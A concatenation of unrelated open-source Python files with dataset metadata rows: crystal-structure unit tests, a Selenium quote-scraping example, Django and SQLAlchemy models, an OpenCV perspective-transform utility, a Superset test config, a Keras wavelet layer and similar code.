self.assertEqual(transformed, self.structure)
def test_transformations_inversions(self):
""" Test that symmetry operations work as expected when inverted. """
operator = np.random.random(size=(3, 3))
inv_op = np.linalg.inv(operator)
transformed1 = self.structure.transform(operator)
transformed2 = transformed1.transform(inv_op)
# transformed2 structure should be different, but equal, to original structure
self.assertIsNot(transformed2, self.structure)
self.assertEqual(transformed2, self.structure)
def test_transform_subclass(self):
""" Test that the object returned by the transform() method is the
same class as the method caller. """
class NewAtomicStructure(AtomicStructure):
pass
structure = NewAtomicStructure(
atoms=[Atom("Ag", [0, 0, 0]), Atom("Ag", [1, 1, 1])]
)
transformed = structure.transform(np.eye(3))
self.assertIs(type(transformed), type(structure))
def test_transformations_correctness(self):
""" Test that AtomicStructure.transform() works as expected. """
operator = 2 * np.eye(3)
transformed = self.structure.transform(operator)
expected_atoms = [atm.transform(operator) for atm in self.structure]
for atm in expected_atoms:
self.assertIn(atm, transformed)
def test_itersorted(self):
""" Test that AtomicStructure.itersorted() works as expected """
sorted_from_structure = list(self.structure.itersorted())
sorted_from_list = list(sorted(self.structure, key=lambda a: a.element))
self.assertListEqual(sorted_from_structure, sorted_from_list)
def test_chemical_composition_trivial(self):
""" Test that AtomicStructure.chemical_composition works as expected """
expected = {"U": 1 / 3, "Ag": 2 / 3}
self.assertDictEqual(self.structure.chemical_composition, expected)
def test_chemical_composition_add_to_unity(self):
""" Test that AtomicStructure.chemical_composition always adds up to 1 """
# Faster to create a large atomic structure from a Crystal object
# Testing for 10 crystal structures only
for name in islice(Crystal.builtins, 10):
with self.subTest("Chemical composition: " + name):
structure = AtomicStructure(atoms=Crystal.from_database(name))
self.assertAlmostEqual(sum(structure.chemical_composition.values()), 1)
def test_chemical_formula(self):
""" Test that AtomicStructure.chemical_formula is working as expected. """
self.assertEqual(self.structure.chemical_formula, "Ag2 U")
def test_chemical_formula_hill_notation(self):
""" Test that the Hill notation, where elements are alphabetically ordered except C and H, which are first. """
structure = AtomicStructure(
atoms=[
Atom("Ag", [0, 1, 0]),
Atom("C", [0, 0, 0]),
Atom("H", [0, 1, 0]),
Atom("U", [1, 1, 1]),
]
)
self.assertEqual(structure.chemical_formula, "C H Ag U")
def test_length(self):
""" Test the __len__ methods """
self.assertTrue(len(self.structure), 3)
def test_containership_substructures(self):
""" Test that containership works on substructure and atoms separately """
self.assertIn(self.substructure, self.structure)
self.assertNotIn(self.structure, self.substructure)
def test_containership_atoms(self):
""" Test that atom containership testing is working, even in substructures """
atm = next(iter(self.substructure))
self.assertIn(atm, self.structure)
def test_equality(self):
""" Test that AtomicStructure is equal to itself but not others """
self.assertEqual(self.structure, self.structure)
self.assertEqual(self.structure, deepcopy(self.structure))
self.assertNotEqual(self.structure, self.substructure)
# Special case: make structures from Crystals
c1 = Crystal.from_database("vo2-m1")
c2 = deepcopy(c1)
s1 = AtomicStructure(atoms=c1)
s2 = AtomicStructure(atoms=c2.atoms)
self.assertEqual(s1, s2)
def test_array(self):
""" Test AtomicStructure.__array__ """
arr = np.array(self.structure)
self.assertSequenceEqual(arr.shape, (len(self.structure), 4))
def test_picklable(self):
""" Test that Crystal instances can be pickled, and that the unpickled instance
is identical to the source """
pickled = pickle.dumps(self.structure)
unpickled = pickle.loads(pickled)
self.assertEqual(self.structure, unpickled)
def test_abstract_base_classes(self):
""" Test that AtomicStructure fits with collections.abc module """
for abstract_base_class in (abc.Hashable, abc.Iterable, abc.Sized):
self.assertIsInstance(self.structure, abstract_base_class)
def test_satisfying(self):
""" Test the AtomicStructure.satisfying method """
uranium = self.structure.satisfying(lambda a: a.element == "U")
silver = self.structure.satisfying(lambda a: a.element == "Ag")
self.assertEqual(len(uranium), 1)
self.assertEqual(len(silver), 2)
if __name__ == "__main__":
unittest.main()
| 39.636792 | 119 | 0.655361 |
ace737d85d7158b4a2038276c09d73768e6eb1dc | 1,698 | py | Python | examples/selenium/any_io/quotes_to_scrape.py | lewoudar/scalpel | 455a3ff766c91d02f33957ea17f1cfbec141ab60 | [
"Apache-2.0"
] | 15 | 2020-11-02T21:11:03.000Z | 2022-03-10T14:17:46.000Z | examples/selenium/any_io/quotes_to_scrape.py | lewoudar/scalpel | 455a3ff766c91d02f33957ea17f1cfbec141ab60 | [
"Apache-2.0"
] | 4 | 2020-11-01T17:54:15.000Z | 2022-03-04T21:42:41.000Z | examples/selenium/any_io/quotes_to_scrape.py | lewoudar/scalpel | 455a3ff766c91d02f33957ea17f1cfbec141ab60 | [
"Apache-2.0"
] | 2 | 2021-05-01T06:59:12.000Z | 2021-11-25T07:01:02.000Z | """Simple example to show usage of anyio SeleniumSpider class"""
from datetime import datetime
from pathlib import Path
import anyio
from selenium.common.exceptions import NoSuchElementException
from scalpel import Configuration, datetime_decoder
from scalpel.any_io import SeleniumSpider, SeleniumResponse, read_mp
async def parse(spider: SeleniumSpider, response: SeleniumResponse) -> None:
for quote_tag in response.driver.find_elements_by_xpath('//div[@class="quote"]'):
await spider.save_item({
'quote': quote_tag.find_element_by_xpath('./span[@class="text"]').text,
'author': quote_tag.find_element_by_xpath('./span/small').text,
'tags': [item.text for item in quote_tag.find_elements_by_xpath('./div/a')]
})
next_link = None
try:
element = response.driver.find_element_by_xpath('//nav/ul/li[@class="next"]/a')
next_link = element.get_attribute('href')
except NoSuchElementException:
pass
if next_link is not None:
await response.follow(next_link)
def date_processor(item: dict) -> dict:
item['date'] = datetime.now()
return item
async def main() -> None:
backup = Path(__file__).parent / 'backup.mp'
config = Configuration(selenium_driver_log_file=None, backup_filename=f'{backup}', item_processors=[date_processor])
spider = SeleniumSpider(urls=['http://quotes.toscrape.com'], parse=parse, config=config)
await spider.run()
print(spider.statistics())
# you can do whatever you want with the results
async for quote in read_mp(filename=backup, decoder=datetime_decoder):
print(quote)
if __name__ == '__main__':
anyio.run(main)
| 34.653061 | 120 | 0.707303 |
ace737e4f16d442aae1d1a53a7a45a0b848373bc | 1,045 | py | Python | gram/migrations/0001_initial.py | maxwaiyaki/instagram | bc203c9dbba0563bb979003624852ccf30fd6325 | [
"MIT"
] | null | null | null | gram/migrations/0001_initial.py | maxwaiyaki/instagram | bc203c9dbba0563bb979003624852ccf30fd6325 | [
"MIT"
] | null | null | null | gram/migrations/0001_initial.py | maxwaiyaki/instagram | bc203c9dbba0563bb979003624852ccf30fd6325 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-12-14 15:17
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('profile_picture', models.ImageField(blank=True, upload_to='profile_pictures/')),
('bio', models.TextField(blank=True, max_length=100)),
('followers', models.ManyToManyField(blank=True, related_name='followers', to=settings.AUTH_USER_MODEL)),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 34.833333 | 129 | 0.654545 |
ace737f8ca6072ff48b77b60f1002ab377e9aeb3 | 586 | py | Python | FapgansControleBot/Models/gans.py | slaapyhoofd/Fapganscontrolebot | 9c5b502e4b69a0f70260b94b0d8f8b88f24cbc09 | [
"MIT"
] | null | null | null | FapgansControleBot/Models/gans.py | slaapyhoofd/Fapganscontrolebot | 9c5b502e4b69a0f70260b94b0d8f8b88f24cbc09 | [
"MIT"
] | null | null | null | FapgansControleBot/Models/gans.py | slaapyhoofd/Fapganscontrolebot | 9c5b502e4b69a0f70260b94b0d8f8b88f24cbc09 | [
"MIT"
] | null | null | null | import datetime
from sqlalchemy import Column, Integer, String, DateTime, ForeignKey
from sqlalchemy.orm import relationship
from FapgansControleBot.Repository.database import Base
class Gans(Base):
__tablename__ = 'gans'
gans_id = Column(Integer, primary_key=True)
user_id = Column(ForeignKey('users.user_id'))
credit_id = Column(ForeignKey('credits.credit_id'))
date = Column(DateTime)
user = relationship("User", back_populates="ganzen")
def __init__(self, user_id: int):
self.user_id = user_id
self.date = datetime.datetime.utcnow()
| 29.3 | 68 | 0.730375 |
ace7383fa63b4e946899e979d3c82f76723d3613 | 612 | py | Python | setup.py | asulibraries/django-historicalrecords | 168cea823f757425e694f4890e82871e783e12e5 | [
"BSD-3-Clause"
] | null | null | null | setup.py | asulibraries/django-historicalrecords | 168cea823f757425e694f4890e82871e783e12e5 | [
"BSD-3-Clause"
] | null | null | null | setup.py | asulibraries/django-historicalrecords | 168cea823f757425e694f4890e82871e783e12e5 | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup, find_packages
def listify(filename):
return filter(None, open(filename, 'r').read().split('\n'))
setup(
name = "django-historicalrecords",
version = "1.0",
url = 'http://github.com/smn/django-historicalrecords',
license = 'BSD',
description = "Marty Alchin's HistoricalRecords from the ProDjango book.",
long_description = open('README.rst','r').read(),
author = 'Marty Alchin',
packages = find_packages('src'),
package_dir = {'': 'src'},
install_requires = listify('requirements.pip'),
classifiers = listify('CLASSIFIERS.txt'),
)
| 30.6 | 78 | 0.665033 |
ace7391ddfe6e02b92dc19a4327b5ee19bdb9cee | 6,413 | py | Python | BirdsEyePerspectiveTransformationUtility.py | hellkrusher/BirdsEyePerspectiveTransformationUtility | bc3ab746e2358d04f13e45cf8c714a5c61a7e9a7 | [
"MIT"
] | 3 | 2021-08-29T19:42:10.000Z | 2022-03-18T10:33:55.000Z | BirdsEyePerspectiveTransformationUtility.py | hellkrusher/BirdsEyePerspectiveTransformationUtility | bc3ab746e2358d04f13e45cf8c714a5c61a7e9a7 | [
"MIT"
] | null | null | null | BirdsEyePerspectiveTransformationUtility.py | hellkrusher/BirdsEyePerspectiveTransformationUtility | bc3ab746e2358d04f13e45cf8c714a5c61a7e9a7 | [
"MIT"
] | null | null | null | # Quick and dirty utility to get coordinates for transforming view into
# a bird's eye view. Useful in OCRs were the camera is in a fixed positioning
# viewing a straight plane.
import cv2
import numpy as np
def onTrackbarChange(trackbarValue):
pass
def order_points(pts):
# initialize a list of coordinates that will be ordered
# such that the first entry in the list is the top-left,
# the second entry is the top-right, the third is the
# bottom-right, and the fourth is the bottom-left
rect = np.zeros((4, 2), dtype = "float32")
# the top-left point will have the smallest sum, whereas
# the bottom-right point will have the largest sum
s = pts.sum(axis = 1)
rect[0] = pts[np.argmin(s)]
rect[2] = pts[np.argmax(s)]
# now, compute the difference between the points, the
# top-right point will have the smallest difference,
# whereas the bottom-left will have the largest difference
diff = np.diff(pts, axis = 1)
rect[1] = pts[np.argmin(diff)]
rect[3] = pts[np.argmax(diff)]
# return the ordered coordinates
return rect
def expandPerspective(rect , width, height):
'''Expand the perspective out to the image limits
by finding intersection using point-slope form'''
# Constants
x = 0
y = 1
# Convert coordinate system
rect[:,1] *= -1
(tl, tr, br, bl) = rect
# Find the slope of each of the 4 lines
slopeTop = (tr[y]-tl[y]) / (tr[x]-tl[x])
slopeBottom = (br[y]-bl[y]) / (br[x]-bl[x])
slopeLeft = (tl[y]-bl[y]) / (tl[x]-bl[x])
slopeRight = (tr[y]-br[y]) / (tr[x]-br[x])
# Assign new points based on image size
pointRight = width,0
pointTop = 0,0
pointBottom = width, height * -1.0
pointLeft = 0, height* -1.0
# Find where the new expanded lines intersect using point slope form
def intersectoin (m1,m2,x1,x2,y1,y2,orig):
x = ((m2*x2-m1*x1)-(y2-y1))/(m2-m1)
#y = ((-1.0*m1*y2 + m1*m2*x2 + y1*m2 )-(m1*m2*x1))/(m2-m1)
y = m1*(x - x1) + y1
try:
x = round(x)
y = round(y)
except:
return orig
return x, y
new_tr = intersectoin (slopeTop,slopeRight,pointTop[x],pointRight[x],pointTop[y],pointRight[y],tr)
new_tl = intersectoin (slopeTop,slopeLeft,pointTop[x],pointLeft[x],pointTop[y],pointLeft[y],tl)
new_br = intersectoin (slopeBottom,slopeRight,pointBottom[x],pointRight[x],pointBottom[y],pointRight[y],br)
new_bl = intersectoin (slopeBottom,slopeLeft,pointBottom[x],pointLeft[x],pointBottom[y],pointLeft[y],bl)
# Convert coordinate system back
new_rect = rect = np.array([new_tl, new_tr, new_br, new_bl], dtype = "float32")
new_rect[:,1] *= -1
return new_rect
# Derived from https://www.pyimagesearch.com/2014/08/25/4-point-opencv-getperspective-transform-example
def four_point_transform(image, pts):
# Unpack points
rect = pts
(tl, tr, br, bl) = rect
# compute the width of the new image, which will be the
# maximum distance between bottom-right and bottom-left
# x-coordinates or the top-right and top-left x-coordinates
widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))
widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))
maxWidth = max(int(widthA), int(widthB))
# compute the height of the new image, which will be the
# maximum distance between the top-right and bottom-right
# y-coordinates or the top-left and bottom-left y-coordinates
heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))
heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))
maxHeight = max(int(heightA), int(heightB))
# now that we have the dimensions of the new image, construct
# the set of destination points to obtain a "birds eye view",
# (i.e. top-down view) of the image, again specifying points
# in the top-left, top-right, bottom-right, and bottom-left
# order
dst = np.array([
[0, 0], #tl
[maxWidth - 1, 0], #tr
[maxWidth - 1, maxHeight - 1], #br
[0, maxHeight - 1]], #bl
dtype = "float32")
# Move image to positive coordinates
min_x = round(abs(np.min(rect[:,0])))
min_y = round(abs(np.min(rect[:,1])))
T = np.matrix( [[ 1 , 0 , min_x], # Get min x
[ 0 , 1 , min_y ], # Get min y
[ 0 , 0 , 1 ]],
dtype = "float32")
# compute the perspective transform matrix and then apply it
M = cv2.getPerspectiveTransform(rect, dst)
warped = cv2.warpPerspective(image, T * M , (maxWidth + min_x , maxHeight + min_y), borderMode=cv2.BORDER_TRANSPARENT)
# return the warped image
return warped
# Open Image
img = cv2.imread('img\\example1.jpeg')
# Open windows for control, original image, and result
cv2.namedWindow('Control', cv2.WINDOW_AUTOSIZE)
cv2.namedWindow('Main', cv2.WINDOW_AUTOSIZE)
cv2.namedWindow('Birds Eye', cv2.WINDOW_AUTOSIZE)
# Track bars for coordinates
cv2.createTrackbar( 'X L Bot', 'Control', 0, img.shape[1], onTrackbarChange )
cv2.createTrackbar( 'Y L Bot', 'Control', img.shape[0], img.shape[0], onTrackbarChange )
cv2.createTrackbar( 'X L Top', 'Control', 0, img.shape[1], onTrackbarChange )
cv2.createTrackbar( 'Y L Top', 'Control', 0, img.shape[0], onTrackbarChange )
cv2.createTrackbar( 'X R Top', 'Control', img.shape[1], img.shape[1], onTrackbarChange )
cv2.createTrackbar( 'Y R Top', 'Control', 0, img.shape[0], onTrackbarChange )
cv2.createTrackbar( 'X R Bot', 'Control', img.shape[1], img.shape[1], onTrackbarChange )
cv2.createTrackbar( 'Y R Bot', 'Control', img.shape[0], img.shape[0], onTrackbarChange )
# Loop
while(1):
# Get Track Bar positions
pts = np.array(eval('[(' + str(cv2.getTrackbarPos('X L Bot','Control')) + ',' + str(cv2.getTrackbarPos('Y L Bot','Control')) + '),' +
'(' + str(cv2.getTrackbarPos('X L Top','Control')) + ',' + str(cv2.getTrackbarPos('Y L Top','Control'))+ '),' +
'(' + str(cv2.getTrackbarPos('X R Top','Control')) + ',' + str(cv2.getTrackbarPos('Y R Top','Control'))+ '),' +
'(' + str(cv2.getTrackbarPos('X R Bot','Control')) + ',' + str(cv2.getTrackbarPos('Y R Bot','Control'))+ ')]'
), dtype = "int32")
# Draw the perspective
imgConnectedPoints = cv2.polylines(img.copy(), [pts], isClosed = True, color = (0,255,0), thickness = 3)
cv2.imshow('Main',imgConnectedPoints)
# Draw the transformed bird's eye view
warped = four_point_transform(img, expandPerspective(order_points(pts), img.shape[1], img.shape[0]))
cv2.imshow('Birds Eye',warped)
# Exit
if cv2.waitKey(1)==27:
exit(0)
cv.detroyAllWindows()
| 37.502924 | 138 | 0.659598 |
ace7391ff13915ec1863667830b936f8b2b24a69 | 653 | py | Python | fuocore/core/furi.py | AmyLewis/feeluown-core | 0aecb39ce49504b04fa54a391260e9976220a288 | [
"MIT"
] | null | null | null | fuocore/core/furi.py | AmyLewis/feeluown-core | 0aecb39ce49504b04fa54a391260e9976220a288 | [
"MIT"
] | null | null | null | fuocore/core/furi.py | AmyLewis/feeluown-core | 0aecb39ce49504b04fa54a391260e9976220a288 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
fuocore.furi
~~~~~~~~~~~~
这个模块提供了 furi 相关对象及处理函数。
一个 furi 例子:fuo://local:song:/Music/xxx.mp3
"""
from collections import namedtuple
FUri = namedtuple(
'FUri',
('scheme', 'provider', 'category', 'identifier')
)
def parse_furi(furi):
scheme, body = furi.split('://')
provider = category = identifier = None
if body:
parts = body.split('/')
if len(parts) == 3:
provider, category, identifier = parts
elif len(parts) == 2:
provider, category = parts
else:
provider = parts[0]
return FUri(scheme, provider, category, identifier)
| 19.205882 | 55 | 0.574273 |
ace7395b55e27ff042c4ab6f3f7c39e70790e034 | 2,218 | py | Python | tools/perf/benchmarks/system_health_unittest.py | sarang-apps/darshan_browser | 173649bb8a7c656dc60784d19e7bb73e07c20daa | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | tools/perf/benchmarks/system_health_unittest.py | sarang-apps/darshan_browser | 173649bb8a7c656dc60784d19e7bb73e07c20daa | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | tools/perf/benchmarks/system_health_unittest.py | sarang-apps/darshan_browser | 173649bb8a7c656dc60784d19e7bb73e07c20daa | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2 | 2021-01-05T23:43:46.000Z | 2021-01-07T23:36:34.000Z | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import sys
import unittest
from benchmarks import system_health as system_health_benchmark
from core import path_util
from page_sets.system_health import system_health_stories
from page_sets.system_health import system_health_story
from telemetry import benchmark as benchmark_module
from py_utils import discover
def _GetAllSystemHealthBenchmarks():
all_perf_benchmarks = discover.DiscoverClasses(
path_util.GetOfficialBenchmarksDir(), path_util.GetPerfDir(),
benchmark_module.Benchmark,
index_by_class_name=True).values()
return [b for b in all_perf_benchmarks if
sys.modules[b.__module__] == system_health_benchmark]
class TestSystemHealthBenchmarks(unittest.TestCase):
def testNamePrefix(self):
for b in _GetAllSystemHealthBenchmarks():
self.assertTrue(
b.Name().startswith('system_health.'),
'%r must have name starting with "system_health." prefix' % b)
def testSystemHealthStorySetIsUsed(self):
for b in _GetAllSystemHealthBenchmarks():
if b is system_health_benchmark.WebviewStartupSystemHealthBenchmark:
continue
self.assertIsInstance(
b().CreateStorySet(None),
system_health_stories.SystemHealthStorySet,
'%r does not use SystemHealthStorySet' % b)
class TestSystemHealthStories(unittest.TestCase):
def testNoOverrideRunPageInteractions(self):
desktop_stories = (
system_health_stories.DesktopSystemHealthStorySet().stories)
mobile_stories = (
system_health_stories.MobileSystemHealthStorySet().stories)
for s in desktop_stories + mobile_stories:
# Long running stories has their own way of collecting memory dumps,
# so they explicitly override RunPageInteractions method.
if s.name.startswith('long_running:'):
continue
self.assertEquals(s.__class__.RunPageInteractions,
system_health_story.SystemHealthStory.RunPageInteractions,
'Story %s overrides RunPageInteractions. Override _DidLoadDocument '
'instead' % s.name)
| 36.360656 | 78 | 0.755636 |
ace73b85b8ff60b2b34a85a524b3e4b4a1df7b62 | 1,936 | py | Python | tests/superset_test_config_sqllab_backend_persist.py | rodrigoguariento/incubator-superset | b2633a51d43faaca74751349b96fc32784d4b377 | [
"Apache-2.0"
] | 7 | 2017-11-01T06:00:12.000Z | 2019-01-05T13:31:48.000Z | tests/superset_test_config_sqllab_backend_persist.py | Odirlei-Stein/incubator-superset | 52afc33b31475536b287b56d262b9eaa32f479ab | [
"Apache-2.0"
] | 108 | 2019-06-10T05:48:22.000Z | 2021-07-26T04:20:03.000Z | tests/superset_test_config_sqllab_backend_persist.py | Odirlei-Stein/incubator-superset | 52afc33b31475536b287b56d262b9eaa32f479ab | [
"Apache-2.0"
] | 4 | 2020-06-25T10:42:36.000Z | 2020-08-13T05:39:09.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# flake8: noqa
import os
from copy import copy
from superset.config import * # type: ignore
AUTH_USER_REGISTRATION_ROLE = "alpha"
SQLALCHEMY_DATABASE_URI = "sqlite:///" + os.path.join(DATA_DIR, "unittests.db")
DEBUG = True
SUPERSET_WEBSERVER_PORT = 8081
# Allowing SQLALCHEMY_DATABASE_URI to be defined as an env var for
# continuous integration
if "SUPERSET__SQLALCHEMY_DATABASE_URI" in os.environ:
SQLALCHEMY_DATABASE_URI = os.environ["SUPERSET__SQLALCHEMY_DATABASE_URI"]
SQL_SELECT_AS_CTA = True
SQL_MAX_ROW = 666
FEATURE_FLAGS = {"foo": "bar"}
def GET_FEATURE_FLAGS_FUNC(ff):
ff_copy = copy(ff)
ff_copy["super"] = "set"
return ff_copy
TESTING = True
SECRET_KEY = "thisismyscretkey"
WTF_CSRF_ENABLED = False
PUBLIC_ROLE_LIKE_GAMMA = True
AUTH_ROLE_PUBLIC = "Public"
EMAIL_NOTIFICATIONS = False
CACHE_CONFIG = {"CACHE_TYPE": "simple"}
class CeleryConfig(object):
BROKER_URL = "redis://localhost"
CELERY_IMPORTS = ("superset.sql_lab",)
CELERY_ANNOTATIONS = {"sql_lab.add": {"rate_limit": "10/s"}}
CONCURRENCY = 1
CELERY_CONFIG = CeleryConfig
DEFAULT_FEATURE_FLAGS = {"SQLLAB_BACKEND_PERSISTENCE": True}
| 30.25 | 79 | 0.76188 |
ace73c6a1668286f32c2a2a538d45c7a2569ede5 | 6,334 | py | Python | blusky/transforms/apply_father_wavelet_2d.py | fogoke/blusky | ca0820a15e171a1289f2e8e479d75ff5c610be99 | [
"BSD-3-Clause"
] | 3 | 2020-03-26T15:10:25.000Z | 2020-11-11T22:13:53.000Z | blusky/transforms/apply_father_wavelet_2d.py | fogoke/blusky | ca0820a15e171a1289f2e8e479d75ff5c610be99 | [
"BSD-3-Clause"
] | 42 | 2019-06-24T15:56:12.000Z | 2020-01-15T21:42:21.000Z | blusky/transforms/apply_father_wavelet_2d.py | enthought/sandia-blusky | bbefd799fa3e4215896006f8de51ce057e47e23e | [
"BSD-3-Clause"
] | 4 | 2020-07-22T11:33:54.000Z | 2021-03-02T21:16:23.000Z | import re
import keras.backend as keras_backend
from keras.layers import DepthwiseConv2D
import numpy as np
from traits.api import Float, HasStrictTraits, Instance, Int, Tuple, Property
from blusky.wavelets.i_wavelet_2d import IWavelet2D
class ApplyFatherWavlet2D(HasStrictTraits):
"""
Provides a "convolution" method that will apply a father wavelet to
the endpoints of a cascade. Be sure to first apply layers to remove
any of the padding.
Assuming the input to the cascade is a power of 2 in shape, the result
will be a set of scattering coefficients at all orders of the transform
sampled regularly throughout the image. You can imagine that every
set of coefficients will be computed at the center of a tile, the shape
of which is determined by the "J" parameter. The degree to which these
tiles over lap is controlled by the "overlap_log_2". For interpretation,
consider values of "J" to give a tile of shape (2**(J+2), 2**(J+2)),
over which the texture of the image can be considered stationary.
The tiles can overlap by a factor of "M", however if you use the
default decimation, you must ensure that you have oversampled enough
to properly represent the stride at all scales of the transform.
With default decimation, oversamples=1, overlap_log_2 can be upto
J - 1. For each unit of overlap, you need to pay the cost of an
additional unit of oversampling.
"""
#: (J) This is the "J" scale parameter of the father wavelet used in the
# transform.
J = Int(2)
#: (M) This is defines the overlap of the tiles, so overlap_log_2 = 0
# would be no overlap, overlap_log_2 = 1 would be 50% overlap,
# overlap_log_2 = 2 would be 75% etc.
overlap_log_2 = Int(0)
#: Size of the image input to the Cascade_2d. This needs to be padded to a
# power of "2" to ensure that the coefficients are consistent.
img_size = Tuple
#: The sample rate of the input data
sample_rate = Float
#: Wavelet to use in convolution
wavelet = Instance(IWavelet2D)
#: Equivalent tile size derived from the log scale J
# J = round(log2(min(tile_size))) - 2
_tile_size = Property(Int, depends_on="J")
def _get__tile_size(self):
size = 2 ** (self.J + 2)
if size > self.img_size[0] or size > self.img_size[1]:
mn = min(self.img_size)
msg = "For image {} by {}, max J is {}".format(
self.img_size[0], self.img_size[1], np.log2(mn) - 2
)
raise RuntimeError(msg)
return (2 ** (self.J + 2), 2 ** (self.J + 2))
def _convolve(self, input_layer, trainable=False):
"""
The concept here is to first derive the applied decimation
from the shape of the input layer, then pad the layer and
apply the a convolution with the father wavelet. The padding
and strideof the convolution is designed to return set of coefficients
for a collections of regular (optionally overlapping) tiles.
This will be the case provided the size of the original input to the
transform are a power of 2.
Parameters
----------
input_layer - Keras Layer
A layer to apply the father wavelet to. The applied wavelet
is derived from the shape of the layer and knowlege of the
input image shape.
trainable - Bool (optional)
Toggle setting the convolution to be trainable. Either way it
is initialized with a gabor wavelet.
Returns
-------
conv - Keras Layer
A Keras layer applying the convolution to the input
"""
# create a convenient name
name = re.sub("[_/].*", "", input_layer.name)
name += "phi"
_, nh, nw, _ = input_layer.shape
nh = nh
nw = nw
# amount of decimation to here.
factor_1 = self.img_size[0] // nh
factor_2 = self.img_size[1] // nw
# how much to decimate the wavelet to required bandwidth
wavelet_stride = min(factor_1, factor_2)
# need to guarantee this, ideally crop the wavelet to a
# power of "2"
wav = self.wavelet.kernel(
0.0, shape=(2 ** (self.J + 2) - 1, 2 ** (self.J + 2) - 1)
)
#
wav = wav[::wavelet_stride, ::wavelet_stride]
# needs to be real
if np.iscomplexobj(wav):
wav = wav.real
# define a little helper to intialize the weights.
def init_weights(shape, **kwargs):
dtype = np.float32
weights = np.zeros(shape, dtype=dtype)
for ichan in range(shape[2]):
weights[:, :, ichan, 0] = wav.astype(dtype)
return keras_backend.variable(value=weights, dtype=dtype)
# use the father wavelet scale here instead of the default:
conv_stride = (
max(
2 ** (-self.overlap_log_2) * self._tile_size[0] // factor_1, 1
),
max(
2 ** (-self.overlap_log_2) * self._tile_size[1] // factor_2, 1
),
)
conv_stride = (int(conv_stride[0]), int(conv_stride[0]))
conv = DepthwiseConv2D(
name=name,
kernel_size=wav.shape,
depth_multiplier=1,
data_format="channels_last",
padding="valid",
strides=conv_stride,
trainable=trainable,
depthwise_initializer=init_weights,
)
return conv(input_layer)
def convolve(self, end_points):
"""
Apply father wavelet convolution.
Parameters
----------
end_points - List(Keras Layers)
Typically this would be the multiple end-points of the 2-D Cascade.
Returns
-------
scattering_transform - List(Keras Layers)
The father wavelet applied to each end-point. The stride and
padding of the convolution produces a consistent set of
coefficients at each scale, provided the shape of the original
image is a power of 2. For example, img.shape = (128, 256).
"""
scattering_transform = [self._convolve(i) for i in end_points]
return scattering_transform
| 35.385475 | 79 | 0.615567 |
ace73c70637fbdb9285a80b3b1a03b0fafeb626d | 631 | py | Python | lib/etc/__init__.py | daijianxin/Parser | 0739216129cd39d69997d28cbc4133b360ea3934 | [
"Apache-2.0"
] | 122 | 2017-11-02T22:17:37.000Z | 2022-01-14T09:55:04.000Z | lib/etc/__init__.py | wfxedu/CRFBiaffineParser | 763368fb8890877694caf0281805da5351d57ef0 | [
"Apache-2.0"
] | 6 | 2017-12-10T10:58:41.000Z | 2019-01-29T12:20:31.000Z | lib/etc/__init__.py | wfxedu/CRFBiaffineParser | 763368fb8890877694caf0281805da5351d57ef0 | [
"Apache-2.0"
] | 35 | 2017-11-27T11:35:03.000Z | 2021-09-26T12:25:52.000Z | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright 2016 Timothy Dozat
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
| 33.210526 | 74 | 0.73851 |
ace73e898c7d473d30fa5b0ec752cb18060ac1b6 | 5,105 | py | Python | hooks/td3.py | IronOnet/tensor2robot | 351cecbf76b71d09b56a766b981e1a15f85d9528 | [
"Apache-2.0"
] | 2 | 2021-10-31T01:06:00.000Z | 2021-11-08T09:43:25.000Z | hooks/td3.py | IronOnet/tensor2robot | 351cecbf76b71d09b56a766b981e1a15f85d9528 | [
"Apache-2.0"
] | null | null | null | hooks/td3.py | IronOnet/tensor2robot | 351cecbf76b71d09b56a766b981e1a15f85d9528 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2019 The Tensor2Robot Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Hook builders for TD3 distributed training with SavedModels."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
